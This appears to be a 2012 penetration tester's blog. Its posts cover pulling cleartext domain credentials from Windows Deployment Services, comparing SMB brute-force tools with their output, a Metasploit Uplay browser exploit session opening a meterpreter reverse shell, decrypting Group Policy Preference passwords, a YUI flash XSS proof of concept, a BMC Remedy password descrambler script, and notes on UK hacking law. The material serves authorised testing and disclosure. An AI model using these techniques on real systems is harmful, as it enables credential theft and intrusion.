Thursday, 1 November 2012

Windows Deployment Services Clear Text Domain Creds

Dave, Rel1k, Kennedy's talk 'Owning One To Rule Them All' at Defcon 20 Las Vegas opened my eyes to using a client's PXEBoot service, normally Windows Deployment Services, to infiltrate their network. The gist of the attack is simple, network boot a computer, retrieve the corporate image, and use that to gain information/credentials for the corporate domain.

The easiest way to do this, other than bringing a seperate machine, is to use a VM, but a lot of the windows boot images do not have drivers for the latest VMWare network interfaces. To get around this we can force a PXEBoot VM Image to use an older NIC by editing the VMX file with the following:

Add: ethernet0.virtualDev = "e1000" after ethernet0.present = "TRUE"

The next step is to network boot, obtain a PXEBoot response, and a Windows Boot Image is sent over TFTP to our machine.

Depending on the configuration two things may occur:

You may be asked for a password to connect to the image share - unfortunately you need a valid domain account at this stage and probably wont get further without it.

Alternatively you get a choice of a number of different images, they all could contain goodies, and are all worth checking out, but installing one can take a significant amount of time.

When you have the installed machine loaded, there's a number of possibilities for obtaining credentials:

a) The image could have been cloned from an existing machine, all post exploitation steps are viable to obtain credentials: hashdump the local accounts or Mimikatz/WCE to retrieve in memory credentials (the machine will often be configured to AutoLogin etc). If you don't have admin credentials on the machine you can mount the VM harddrive and copy the SYSTEM and SAM files to your host machine for cracking. Local credentials will often be the same for many client workstations/laptops and they may even be valid on servers.

b) The image could be automatically joined to the domain - we can now enumerate users, group policy preference files, logon scripts and domain shares to discover credentials.

c) Find the unattend.xml or imageunattend.xml file used to configure the image. If the process has worked correctly most credentials will be wiped from the XML file as they are applied. You may have some luck pausing the VM at certain points after installation but before it boots and mounting the virtual disk to obtain the unprocessed unattend.xml.

All of the above, is generally pretty easy, but can be very time consuming. You may not have set your VM harddrive large enough for the image, you may not have enough room spare to host the VM, errors with drivers may occur as they are meant for specific hardware, and it takes time to boot over the network and install each operating system they have available.

To ease my pain when performing these checks, I started writing some Metasploit modules to speed up the process:  auxiliary/scanner/pxe/pxe_servers which simply sends out DHCP Requests and listens for a DHCP Response containing the location of the PXEBoot server.

I need to do some more work on this - you may find this python more useful:

We can verify this is a Windows Deployment Service with the following command (if you have installed Impacket or use Metasploit's auxiliary/scanner/dcerpc/endpoint_mapper): 135/TCP |grep -i "1a927394-352e-4553-ae3f-7cf4aafca620"
1A927394-352E-4553-AE3F-7CF4AAFCA620/Version: 1
1A927394-352E-4553-AE3F-7CF4AAFCA620/StringBindings: ncacn_ip_tcp:[5040]

(1a927394-352e-4553-ae3f-7cf4aafca620 being the GUID identifying the Windows Deployment Services RPC Endpoint)

The goal of my investigations now, was to discover how to obtain the unadulterated unattend file without going through the rigmarole of performing a full PXEBoot install. After setting up my own WDS it is obvious that two SMB shares are often used to deploy the windows images, and unattend files:

\\server\RemInst  is the default folder used by Windows Deployment Services and should always have this name no matter which drive or folder they store images in.
\\server\DeploymentShare$  is the default folder used by Microsoft Deployment Toolkit, but this can be renamed but should generally always have a comment of 'MDT Deployment Share'.

When we gain access to these shares, it is simple to do a search for *unattend.xml but I believe they are generally located in the following paths:


These shares need a domain login, which is why we get prompted at the start of the process if the administrator hasn't set the installation to be completely unattended or 'zero-touch'. Fortunatly administrators often do configure WDSthis way and if this is the case TWO unattend files are actually used:
Windows Deployment Services client unattend file. This file uses the Unattend.xml format and is stored on the Windows Deployment Services server in the \WDSClientUnattend folder. It automates the Windows Deployment Services client user interface screens (such as entering credentials, choosing an install image, and configuring the disk).

Image unattend file. This file uses either the Unattend.xml or Sysprep.inf format, depending upon the version of the operating system in the image. It is used to configure unattended installation options during Windows Setup and is stored in a subfolder (either $OEM$ structure or \Unattend) in the per-image folder. It automates the remaining phases of Setup (for example, offline servicing, Sysprep specialize, and mini-setup).

That first WDS client unattend file may contain valid domain credentials, but how do we view it?

Microsoft decided this would be a good file to send in clear text without requiring authentication making it trivial to recover if we monitor the traffic of our VM install with the following Wireshark filter 'ip.addr==x.x.x.x && dcerpc':

I didn't want to have to boot up a VM to recover this file everytime,  it can take some time for TFTP to transfer the boot files, and the process can really eat into your testing time so I went about creating a tool to recover the unattend file directly from this service.

Fortunately for us this protocol is all documented on technet and is the Windows Deployment Services Control Protocol (WDSCP) running on TCP/5040.

It also uses the Windows Deployment Services Operation System Deployment Protocol Specification (WDSOSDPS) where anyone digging deep enough into the documentation may have discovered this issue by RTFM:

To that end I have created a metasploit module:


It will retrieve the unattend files for all architectures and store as loot. It will then parse the XML to retrieve the credentials and store as creds.


What if I protect my WDS installation by setting it to 'Respond only to known client computers' or even 'Do not respond to any client computers'?

As you can see from the tab name this only prevents the server from responding to DHCP/BOOTP PXE Requests, the RPC endpoint is still active, and will still respond to requests for the unattend file without any verification of the client. Requests for the unattend file do not show up in the 'Pending Devices', this only occurs if you download and load the boot file, making this method more stealthy than a VM boot.

Finally to make use the gained credentials, and hopefully obtain further credentials I created auxiliary/gather/windows_deployment_services_shares. This will enumerate the shares on the host and search through for unattend files and then extract credentials from them:

Wednesday, 12 September 2012

Is Your SMB Bruteforcer Lying To You?

A few weeks back, on a job, I had enumerated a list of domain users from a linux device attached to a windows domain due to anonymous access. Not knowing the lockout policy I gave a quick attempt to enumerate which accounts had a weak password, 'Password1', using Metasploit's smb_login module.

I got one positive result back, a normal domain user. But unknown to me at the time, in that sea of red error responses, I had domain admin accounts responding to valid credentials. However it was not a login success, but rather STATUS_PASSWORD_MUST_CHANGE which wasn't highlighted by Metasploit. Domain Admins can RDP in and update their password so this was an instant win - when I finally spotted it by accident sometime later...

I tried again with Hydra which picked up a second account, but not a third account responding with a different error message (STATUS_ACCOUNT_LOCKED_OUT).

When I got back I set about updating the smb_login module to catch these valid credentials and looked at the different responses. It's easy to lose track of these valid creds when you are enumerating thousands of other accounts reporting STATUS_LOGIN_FAILURE:

Looking at the Microsft SMB Error Codes and NTSTATUS values, the NMAP smb-brute script, and Medusa source code I found the following status codes probably indicate correct credentials:
STATUS_ACCOUNT_LOCKED_OUT (Correction: LOCKED_OUT responds with invalid creds as well)
I was able to test all of these, with the exception of STATUS_INVALID_WORKSTATION, by modifying Active Directory user accounts, GPO, or Local Security Policies. AUTHENTICATION_FIREWALL_PROTECTION is named by Medusa but does not appear to map to a known SMB Error Code but appears to map to 0x00000064 and occurs when the machine is protected by some kind of authentication firewall.
STATUS_LOGIN_TYPE_NOT_GRANTED - GPO/Security Settings/Local Policies/Deny access to this computer from the network
STATUS_ACCOUNT_RESTRICTION - Local Security Policy/Accounts: Limit local account use of blank passwords to computer.
Due to the disparities I had seen in my toolkit, I thought it best to see which provide the most accurate and useful feedback so I went about testing and comparing the following:

Metasploit 4.5.0 smb_login module
Hydra 7.3
Ncrack 0.4ALPHA
Medusa v2.1.1
NMAP 6.01 smb-brute plugin

The following table shows the results of each tool against the expected 'valid' credential status codes:

STATUS Metasploit Hydra Ncrack Medusa NMAP

Hydra identified some status codes but not others. It may be a design decision to not report certain creds such as ACCOUNT_DISABLED, as they are unlikely to be useful when testing. However PASSWORD_EXPIRED can often be fixed with a console or RDP login, ACCOUNT_LOCKED_OUT may reset after a certain period (default 30 mins), and INVALID_LOGIN_HOURS just means you just need to try again later.

The NMAP smb-brute failed to identify a valid login against even my positive test case but did identify all accounts as 'locked'. Perhaps I was using it incorrectly and happy to be corrected, see later for output. It also automatically performed attempts with a blank password, locking out accounts earlier than expected and I would avoid it for now.

Ncrack identified a correct login but failed to identify any of the other status codes. I believe it is no longer under development in favour of Nmap scripts.

Medusa performed admirably identifying all cases and marking them as successful.

Metasploit presents the status codes but does not flag the credentials as valid. It also performs unpredictably depending on the SMBDomain setting:

Firstly 'unset SMBDomain' will likely cause all accounts to fail.

Against the DC with SMBDomain set to a random value, 'SomeIncorrectDomain1234', all status codes are correctly returned and valid domain accounts are marked correctly. The same is true for '' and '.'.

Against a Domain Workstation with SMBDomain set to a random value, all status codes return STATUS_LOGON_FAILURE except for valid credentials which will login. Set to  '.' will also return STATUS_LOGON_FAILURE however a blank SMBDomain. '', will return the detailed error codes.

With the correct SMBDomain things work as expected (but you may not always know this).

For now I would recommend Medusa for brute forcing SMB. I have a pull request to submit an updated Metasploit smb_login module, but this requires more testing as I have just been using it against Windows 2k12 DC and a Windows XP SP3 so some validation especially against Linux SAMBA installations is necessary, and possibly on LM systems?

My changes to the module pick out valid credentials in blue, these should be much more visible when placed against a lot of red STATUS_LOGON_FAILURE. They are also all reported to the database but as inactive credentials so need to be accessed with the command 'creds all'.

Tool output (for anyone that is interested):


root@bt:~# medusa -h -p "" -C /root/jobs/users_medusa.txt -M smbnt -O ~medusa_output
Medusa v2.1.1 [] (C) JoMo-Kun / Foofus Networks <>
ACCOUNT CHECK: [smbnt] Host: (1 of 2, 0 complete) User: test1 (1 of 8, 0 complete) Password: Password1 (1 of 2 complete)
ACCOUNT FOUND: [smbnt] Host: User: test1 Password: Password1 [SUCCESS (0x000224:STATUS_PASSWORD_MUST_CHANGE)]
ACCOUNT CHECK: [smbnt] Host: (1 of 2, 0 complete) User: test2 (2 of 8, 1 complete) Password: Password1 (1 of 2 complete)
ACCOUNT FOUND: [smbnt] Host: User: test2 Password: Password1 [SUCCESS (0x000071:STATUS_PASSWORD_EXPIRED)]
ACCOUNT CHECK: [smbnt] Host: (1 of 2, 0 complete) User: test3 (3 of 8, 2 complete) Password: Password1 (1 of 2 complete)
ACCOUNT FOUND: [smbnt] Host: User: test3 Password: Password1 [SUCCESS (0x000072:STATUS_ACCOUNT_DISABLED)]
ACCOUNT CHECK: [smbnt] Host: (1 of 2, 0 complete) User: test4 (4 of 8, 3 complete) Password: Password1 (1 of 2 complete)
ACCOUNT FOUND: [smbnt] Host: User: test4 Password: Password1 [SUCCESS (0x000193:STATUS_ACCOUNT_EXPIRED)]
ACCOUNT CHECK: [smbnt] Host: (1 of 2, 0 complete) User: test5 (5 of 8, 4 complete) Password: Password1 (1 of 2 complete)
ACCOUNT FOUND: [smbnt] Host: User: test5 Password: Password1 [SUCCESS (0x00006F:STATUS_INVALID_LOGON_HOURS)]
ACCOUNT CHECK: [smbnt] Host: (1 of 2, 0 complete) User: test6 (6 of 8, 5 complete) Password: Password1 (1 of 2 complete)
ACCOUNT FOUND: [smbnt] Host: User: test6 Password: Password1 [SUCCESS]
ACCOUNT CHECK: [smbnt] Host: (1 of 2, 0 complete) User: test7 (7 of 8, 6 complete) Password: Password1 (1 of 2 complete)
ACCOUNT FOUND: [smbnt] Host: User: test7 Password: Password1 [ERROR (0x000234:STATUS_ACCOUNT_LOCKED_OUT)]
ACCOUNT CHECK: [smbnt] Host: (1 of 2, 0 complete) User: test9 (8 of 8, 7 complete) Password: Password1 (1 of 2 complete)
ACCOUNT FOUND: [smbnt] Host: User: test9 Password: Password1 [SUCCESS (0x00015B:STATUS_LOGON_TYPE_NOT_GRANTED)]
ACCOUNT CHECK: [smbnt] Host: (2 of 2, 1 complete) User: test8 (1 of 1, 0 complete) Password:  (1 of 2 complete)
ACCOUNT FOUND: [smbnt] Host: User: test8 Password:  [SUCCESS (0x00006E:STATUS_ACCOUNT_RESTRICTION)]


root@bt:~/nmap# ncrack -U /root/jobs/users_nopass.txt --pass Password1 smb://
Starting Ncrack 0.4ALPHA ( ) at 2012-09-12 21:24 BST
Discovered credentials for smb on 445/tcp: 445/tcp smb: 'test6' 'Password1'

Ncrack done: 1 service scanned in 3.00 seconds.
Ncrack finished.root@bt:~/nmap# ncrack -U /root/jobs/users_nopass.txt --pass Password1 smb://
Starting Ncrack 0.4ALPHA ( ) at 2012-09-12 21:24 BST
Discovered credentials for smb on 445/tcp: 445/tcp smb: 'test6' 'Password1'

Ncrack done: 1 service scanned in 3.01 seconds.
Ncrack finished.


root@bt:~/jobs# hydra -C users_colon.txt smb
Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra ( starting at 2012-09-12 21:24:39
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] 1 task, 1 server, 9 login tries, ~9 tries per task
[DATA] attacking service smb on port 445
[445][smb] host:   login: test1   password: Password1
[445][smb] host:   login: test4   password: Password1
[445][smb] host:   login: test6   password: Password1
[445][smb] host:   login: test8   password:
[445][smb] host:   login: test9   password: Password1
[STATUS] attack finished for (waiting for children to finish)
1 of 1 target successfuly completed, 5 valid passwords found
Hydra ( finished at 2012-09-12 21:24:39root@bt:~/jobs# hydra -C users_colon.txt smb
Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra ( starting at 2012-09-12 21:24:53
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] 1 task, 1 server, 9 login tries, ~9 tries per task
[DATA] attacking service smb on port 445
[445][smb] host:   login: test1   password: Password1
[445][smb] host:   login: test4   password: Password1
[445][smb] host:   login: test6   password: Password1
[445][smb] host:   login: test8   password:
[445][smb] host:   login: test9   password: Password1
[STATUS] attack finished for (waiting for children to finish)
1 of 1 target successfuly completed, 5 valid passwords found
Hydra ( finished at 2012-09-12 21:24:53

Metasploit smb_login

  Name              Current Setting       Required  Description
   ----              ---------------       --------  -----------
   BLANK_PASSWORDS   false                 no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                     yes       How fast to bruteforce, from 0 to 5
   PASS_FILE                               no        File containing passwords, one per line
   PRESERVE_DOMAINS  true                  no        Respect a username that contains a domain name.
   RECORD_GUEST      false                 no        Record guest-privileged random logins to the database
   RHOSTS            yes       The target address range or CIDR identifier
   RPORT             445                   yes       Set the SMB service port
   SMBDomain         WORKGROUP             no        SMB Domain
   SMBPass                                 no        SMB Password
   SMBUser                                 no        SMB Username
   STOP_ON_SUCCESS   false                 yes       Stop guessing when a credential works for a host
   THREADS           1                     yes       The number of concurrent threads
   USERPASS_FILE     /root/jobs/users.txt  no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false                 no        Try the username as the password for all users
   USER_FILE                               no        File containing usernames, one per line
   VERBOSE           true                  yes       Whether to print output for all attempts

[*] SMB - Starting SMB login bruteforce
[-] - This system allows guest sessions with any credentials, these instances will not be reported.
[-] - FAILED LOGIN (Windows Server 2012 Release Candidate Datacenter 8400) test1 : Password1 (STATUS_PASSWORD_MUST_CHANGE)
[-] - FAILED LOGIN (Windows Server 2012 Release Candidate Datacenter 8400) test2 : Password1 (STATUS_PASSWORD_EXPIRED)
[-] - FAILED LOGIN (Windows Server 2012 Release Candidate Datacenter 8400) test3 : Password1 (STATUS_ACCOUNT_DISABLED)
[-] - FAILED LOGIN (Windows Server 2012 Release Candidate Datacenter 8400) test4 : Password1 (STATUS_ACCOUNT_EXPIRED)
[-] - FAILED LOGIN (Windows Server 2012 Release Candidate Datacenter 8400) test5 : Password1 (STATUS_INVALID_LOGON_HOURS)
[*] Auth-User: "test6"
[+] - SUCCESSFUL LOGIN (Windows Server 2012 Release Candidate Datacenter 8400) 'test6' : 'Password1'
[-] - FAILED LOGIN (Windows Server 2012 Release Candidate Datacenter 8400) test7 : Password1 (STATUS_ACCOUNT_LOCKED_OUT)
[*] Auth-User: "test8"
[+] - SUCCESSFUL LOGIN (Windows Server 2012 Release Candidate Datacenter 8400) 'test8' : ''
[-] - FAILED LOGIN (Windows Server 2012 Release Candidate Datacenter 8400) test9 : Password1 (STATUS_LOGON_TYPE_NOT_GRANTED)
[-] SMB - [10/10] - FAILED LOGIN (Windows Server 2012 Release Candidate Datacenter 8400) test9 :  (STATUS_LOGON_FAILURE)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Nmap smb-brute

root@bt:~# nmap -p445 --script=smb-brute --script-args smblockout=true,userdb=/root/jobs/users_nopass.txt,passdb=/root/jobs/passes.txt
Starting Nmap 6.01 ( ) at 2012-09-12 22:31 BST
Nmap scan report for WIN-0T8EP9QMRVD.HMS (
Host is up (0.00068s latency).
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:49:2B:21 (VMware)

Host script results:
| smb-brute:
|   No accounts found
|_  Locked accounts found: test1, test2, test3, test4, test5, test6, test7

Nmap done: 1 IP address (1 host up) scanned in 0.43 seconds

Tuesday, 31 July 2012

Ubisoft Browser Plugin Exploit

As an exercise in developing for Metasploit myself and a couple of colleagues attempted to port the recent Ubisoft ActiveX Plugin Command Execution Exploit (versions <= 2.03) disclosed by Tavis Ormandy:

Its a very simple exploit, as it just takes the path to an exe and loads it for you, no memory corruption to worry about. Our initial attempt would just run any local executable, and whilst developing this Ubisoft pushed out a very swift patch to prevent this flaw.

Its still possible to use the old installer for 2.03, disconnect from the internet to prevent the update process, login, and set uplay into offline mode to prevent further updates. This also means there might be a few souls out there still running vulnerable versions but they will be few and far between.

It did not work in Windows 7 but happily in Windows XP. Not sure why this is but nevermind. Tested it in IE should theoretically work in other browsers but they generally did not have the plugin registered.

Further feedback from Rapid7's Sinn3r suggested using WebDAV to deliver the payload rather than limiting to just local files, so I butchered webdav_dll_hijacker.rb to serve exes. Had a few problems in that when requesting the exe it would then try and request xxx.exe.Manifest and DLLs corrupting the executable, but with a helpful hint from HDM to serve these with a 404 request it was off and running:
 _                                                      _
/  \  / \        __                          _   __    /_/ __
| |\ /  | _____  \ \            ___   _____ | | /   \  _   \ \
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | | | |  || | |- -|
|_|   | | | _|__  | |_  / -\ __\ \   | |    | |_ \__/ | |  | |_
      |/  |____/  \___\/ /\  \___/   \/      \__|     |_\  \___\

       =[ metasploit v4.4.0-release [core:4.4 api:1.0]
+ -- --=[ 917 exploits - 495 auxiliary - 150 post
+ -- --=[ 250 payloads - 28 encoders - 8 nops

msf > use exploit/windows/browser/ubisoft_uplay_cmd_exec
msf  exploit(ubisoft_uplay_cmd_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(ubisoft_uplay_cmd_exec) > set LHOST
msf  exploit(ubisoft_uplay_cmd_exec) > exploit
[*] Exploit running as background job.
msf  exploit(ubisoft_uplay_cmd_exec) >
[*] Started reverse handler on
[*] Exploit URI:
[*] Using URL:
[*]  Local IP:
[*] Server started.
[*]     ubisoft_uplay_cmd_exec - GET => Exploit
[*]     ubisoft_uplay_cmd_exec - GET => Payload
[*] Sending stage (752128 bytes) to
[*] Meterpreter session 1 opened ( -> at 2012-07-31 20:45:15 +0100

Hopefully be included in the main trunk but unlikely to get any real world shells with it due to Ubisoft's swift turnaround!

Wednesday, 27 June 2012

Scan SSL Ciphers via Web Proxy

None of my existing tools gave the option of using web proxy to retrieve the SSL cipher strengths supported by a web server. With a bit of googling I came across SSLyze v0.4 which has recently added support for this.

It allows HTTP Web Proxies via the --http_tunnel command and has support fot TLS 1.1 and 1.2 -good stuff.

It's currently in BackTrack but only v0.3 in /pentest/web/sslyze/.

Friday, 22 June 2012

Exploiting Windows 2008 Group Policy Preferences - Expanded

This follows on from the disclsoure which discussed how Group Policy Preferences can be used to create Local Users on machines and the resulting passwords easily decrypted. (Edit: 25/7/2012 Metasploit module now available in the framework)

Browsing the MSDN documentation I noticed that there were many other preferences that could be set that also allow a password to be stored. For example Services.xml specifies services to run on end machines, and can specify a specific user and password for that service to run as.

Whilst these preferences may not be used as commonly as local users preferences (to set local administrator passwords), they may lead to current valid domain credentials rather than just local users accounts - for example specifying a domain user to connect to a network share in Drives.xml.

In addition to Groups.xml the following preference policy files will take an optional 'cpassword' attribute:






Working with scriptmonkey, who already had a DC configured, we verified this theory against the DataSources by creating one with the following attributes:

 <Properties action="U" userDSN="0" dsn="test" driver="SQL Server" description="test data source" username="testusername" cpassword="AzVJmXh/J9KrU5n0czX1uBPLSUjzFE8j7dOltPD8tLk" />

D:\> AzVJmXh/J9KrU5n0czX1uBPLSUjzFE8j7dOltPD8tLk

Solution - dont specify passwords within the Group Preference Policies as these are quite trivial to retrieve and decode!

Playing around with Win Server 2012 it looks like there is more warning about these settings:


Also dont forget you can search the domain/SYSVOL/scripts/ folder (NETLOGON is a mirror for Win2K machines) for hardcoded passwords that administrators have included in scripts... However that functionality isn't included in the module but findstr for password may pay dividends!

Monday, 18 June 2012

YUI <v2.8.2 Reflective XSS Flash swf

Couldn't find an example POC for this exploit, so had to do some diggin.

'Cross-site scripting (XSS) vulnerability in the Flash component infrastructure in YUI 2.4.0 through 2.8.1, as used in Bugzilla, Moodle, and other products, allows remote attackers to inject arbitrary web script or HTML via vectors related to charts/assets/charts.swf.'

 I eventually found where the parameters were being passed to the Flash SWF. 'Use FlashVars to pass variables to SWF files'.

For future reference I would just do a search for "flashvars". 

<object width="100%" height="100%" id="yuigen1" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000">

<param name="movie" value="./Scripts/Yahoo/charts/assets/charts.swf"/>

<param name="quality" value="high"/>

<param name="allowScriptAccess" value="always"/>

<param name="wmode" value="opaque"/>

<param name="flashvars" value="allowedDomain="/>

These arguments can also be passed to the SWF in a GET request e.g.


Now I just have to work out whick parameter causes the XSS, so using any decompiler available I did a search for the parameter names, 'allowedDomain', 'elementID', and 'eventHandler':

protected function initializeComponent() : void


this.elementID = this.loaderInfo.parameters.elementID;

this.javaScriptEventHandler = this.loaderInfo.parameters.eventHandler;

var allowedDomain:* = this.loaderInfo.parameters.allowedDomain;



and, this.elementID, event);

This passes elementID as the first parameter to the javaScriptEventHandler.

The following example shows how you can use the ExternalInterface class

(flash.external.ExternalInterface) to send a string from Flash Player to the HTML container where it is displayed using the JavaScript alert() function.

function button_click(evt:MouseEvent):void {"alert", xmlResponse);


Brilliant, the example from Adobe shows us exactly how to do an ALERT msg box.

I just change the eventHandler from YAHOO.Widget.FlashAdapter.eventhandler to alert and I get a popup for 'yuigen1'.

I can then change the elementID to be 'XSS' and I have my XSS popup proof of concept:

Similarly for uploader.swf (I didn't have swfstore.swf on the server to test but I believe the following would also work) :

Tuesday, 22 May 2012

BMC Remedy Password Descrambling

The BMC Remedy application scrambles the users password with client side javascript on the login.jsp page.

// Scrambles passwords using simple cipher algorithm
function getScrambledPassword(pwd) {
    var cipher = ['k', 's', 'z', 'h', 'x', 'b', 'p', 'j', 'v', 'c', 'g', 'f', 'q', 'n', 't', 'm'];
    var result="";
    if (pwd == null)
        pwd = "";
    pwd = encodeURIComponent(pwd);
    //alert("encoded password: " + pwd);
    for(var i=0;i<pwd.length;i++) {
            var cc = pwd.charCodeAt(i);
        result += cipher[Math.floor(cc/16)] + cipher[cc%16];
    //alert("scrambled password: " + result);
    return result;
This is a very weak encryption cipher and easily decoded, so provides no real protection for your passwords. Ensure your web application is only served over HTTPS to protect your password and do not rely on this functionality. The following proof of concept reverses the cipher:
  1. #!/usr/bin/python
  2. from array import *
  3. import sys
  4. if len(sys.argv) != 2:
  5.         print "# BMC Remedy Password Descrambler"
  6.         print "# Author: Meatballs"
  7.         print "# Usage: ./ ciphertext"
  8. else:
  9.         cipherText = sys.argv[1]
  10.         print "CipherText: " + cipherText
  11.         cipher = array('c', 'kszhxbpjvcgfqntm')
  12.         plainText = "PlainText: "
  13.         i = 0
  14.         while i < len(cipherText):
  15.                 x = cipher.index(cipherText[i]) * 16
  16.                 i += 1
  17.                 y = cipher.index(cipherText[i])
  18.                 z = x + y
  19.                 plainText += chr(z)
  20.                 i += 1
  21.         print plainText
Example output:

root@bt:/root/# ./ bkpsjhjhjjhkjzpxzs
CipherText: bkpsjhjhjjhkjzpxzs
PlainText: Passw0rd!

Read more:

Tuesday, 3 April 2012

Relevant Penetration Testing Legislation in the UK

I've compiled some short revision notes on UK legislation with regards to Penetration Testing and Security Research etc. Feel free to comment or correct.

Computer Misuse Act 1990
    • Unauthorised access to computer material (section 1);
    • Unauthorised access with intent to commit or facilitate commission of further offences (section 2); and
    • Unauthorised acts with intent to impair, or with recklessness as to impairing, operation of computer, etc. (section 3)
      • Making, supplying or obtaining articles for use in offence under section 1 or 3 (section 3a)
Originally nothing to make DOS attacks illegal, but modifications in Police and Justice Act 2006 changed Section 3. DDOS via botnets were already illegal as you have unauthorised access.

For most actions you would need to be doing it with intent to cause the offence, unless you are reckless. 

Ensure you have written permission to attack systems and ensure you do not go out of scope (follow redirects?).

Human Rights Act 1998
Article 8 of the Human Rights Act
Right to respect for private and family life
  1. Everyone has the right to respect for his private and family life, his home and his correspondence.
  2. There shall be no interference by a public authority with the exercise of this right except such as is in accordance with the law and is necessary in a democratic society in the interests of national security, public safety or the economic well-being of the country, for the prevention of disorder or crime, for the protection of health or morals, or for the protection of the rights and freedoms of others.

Data Protection Act 1998
    • Section 55 – Unlawful obtaining of personal data. This section makes it an offence for people (Other Parties), such as hackers and impersonators, outside the organisation to obtain unauthorised access to the personal data.

    • Personal (identifiable) data shall be obtained only for one or more specified and lawful purposes, and shall not be further processed in any manner incompatible with that purpose or those purposes.
    • Appropriate technical and organisational measures shall be taken against unauthorised or unlawful processing of personal data and against accidental loss or destruction of, or damage to, personal data.
Ensure you do not keep any records that would fall under the act for longer than is necessary - i.e. prove it is accessible and do not back up those records. Data controllers may want to employ you to test they have appropriate measures in place to secure the data.

Police and Justice Act 2006

    • Increased penalties of Computer Misuse Act. (Makes unauthorized computer access serious enough to fall under extradition)
    • Made it illegal to perform DOS attacks.
    • Made it illegal to supply and own hacking tools.
    • Be careful about how you release information about exploits!
"The current Home Office line appears to be a balance of probabilities argument, that a court decide whether it is more likely than not each individual instance of the article will be used to commit an offence, ie the offence is only committed if it will be used criminally more than legally."

Most hacking tools are normal tools used in a slightly different manner. It is possible to fully compromise a machine using a standard web browser with SQL injection etc.You probably don't want to write a proof of concept exploit that deletes the whole filesystem rather than just loading calc.

Regulation of Investigatory Powers Act 2000
    • Can be required to hand over passwords or encryption keys (part III)
    • Must keep quiet that these have been passed over.
    • Failure to do so automatic 2-3 year jail sentances.
What if you uncover encryption/passwords for a client and then are required to hand these over to authorities? What if you have forgotton your password? A good act if you want to work for GCHQ...
2012 - Extensions to this act possibly being introduced:

Serious Crime Act 2007

    • Amends Computer Misuse Act and Police and Justice Act (generally makes it less severe).
    • You have to be 'reckless' when providing hacking tools

Other relevant legislation:

Official Secrets Act 1989

    Most testers working on HMG stuff probably work under the OSA at some point.

Communications Act 2003

    Illegal to dishonestly use an electronic communication service  to avoid payment of service. Makes using open WiFi services potentially illegal (ie using someone's home network that is unsecured).

Copyright Designs and Patent Act 1988

    Do you have licences for everything?

    Vicarious Liability - makes your employer liable if you install copied software.

Fraud Act 2006

    Phising etc would fall under this if done for illegal purposes.